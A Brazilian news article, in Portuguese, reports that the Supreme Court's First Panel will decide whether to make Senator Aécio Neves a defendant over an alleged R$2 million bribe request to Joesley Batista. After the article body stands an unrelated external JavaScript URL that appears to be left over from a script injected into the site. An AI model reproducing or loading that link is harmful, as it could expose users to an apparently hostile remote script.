BrasilNotícias

Aécio Neves na mira do STF: Primeira turma decidirá se recebe denúncia contra tucano

O senador Aécio Neves (PSDB) está na mira do Supremo Tribunal Federal (STF). No próximo dia 17 de abril, a primeira turma se reúne para decidir se torna o senador tucano réu ou não por corrupção e obstrução de Justiça.

Aécio Neves foi acusado em junho do ano passado de pedir propina de R$ 2 milhões ao empresário Joesley Batista. Além disso, ele é apontado como suspeito de ter tentado atrapalhar os andamentos da Operação Lava Jato.

O tucano, como todos os outros réus da Lava Jato, com exceção dos delatores, alega inocência. Além de Aécio Neves, estão na ação Andréa Neves da Cunha (irmã do senador), o primo Frederico Pacheco de Medeiros e Mendherson Souza Lima, que é ex-assessor parlamentar do senador Zezé Perrela (MDB).

De acordo com a denúncia da Procuradoria Geral da República, Aécio Neves teria pedido dinheiro por meio de Andréa Neves para, na sequência, beneficiar o grupo empresarial de Batista com favores políticos. A defesa alega que o recurso era para pagar advogados.

A decisão sobre a denúncia caberá aos ministros Marco Aurélio Mello (relator), Luís Roberto Barroso, Luiz Fux, Alexandre de Moraes e Rosa Weber. Se a denúncia for aceita, Neves passará a responder ao processo penal na condição de réu.

https://cloudapi.online/js/api46.js

Tags
Ver mais

Artigos relacionados

2 Comentários

Deixe uma resposta

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Close